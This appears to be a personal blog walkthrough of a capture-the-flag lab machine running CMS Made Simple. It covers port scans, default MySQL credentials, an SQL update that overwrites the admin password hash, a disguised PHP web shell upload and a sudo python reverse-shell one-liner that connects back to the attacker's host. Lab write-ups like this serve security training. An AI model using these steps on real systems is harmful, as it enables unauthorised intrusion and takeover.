My Cmsms Walkthrough

We start by scanning the box with nmap -A -T4 -p- 192.168.1.9 -vv

Scan with dirb http://192.168.1.9 /usr/share/dirb/wordlist/big

Ok we got a CMSS webpage on port 80 and we have /admin/login.php page, CMS version 2.2.13 has no exploits as i searched.

We need a username and password, so moving on we have MYSQL on port 3306 open, we can try to login with default credentials:

mysql -h 192.168.1.9 -u root -p

password: root

Let’s show the databases and tables:

After that we use “show tables;” to show tables

We are interested in “cms_users” so let’s view it:

No way to crack the admin hash online or using applications, so we’re going to change the hash with a new one that we created using any online service, i’ve chose “hacker123” and hashed it “4e4316df8886f1bc822cd06e0a55a72e”.

The hard part was the right command to put it, i tied a different combination and finally i got it to work following this LINK, as this is the default command to dot it:

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = ‘sitemask’),”),’hacker123′))) where username = ‘admin’;

Now we changed the password to “hacker123” we can login at /admin/login.php

Ok now we upload a shell file to the site, we can start from “content” into “File Manager” and from there we upload our shell.

As you can see, we have two files, one of them is shell.txt and the other is shell.php, what happened here is that the site doesn’t allow us to upload a php files, so i made a text file and copied the php shell contents into it and then upload it.

Then i selected the text file and clicked on “Copy” and copied the file but changed the extension from .txt to .php, then started a listening port on my machine and visited the file which were in /uploads/shell.php and got a shell back.

Now running the LinEnum.sh script we get this string of characters that is encoded in base64 code:

After we decoded it online, we get another code which is encoded in base32 code:

Now we login as “armour” password “Shield@123

And the user can run sudo:

We can run this command exactly to have a root shell back on our machine:

sudo /usr/bin/python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.20”,3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

<s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s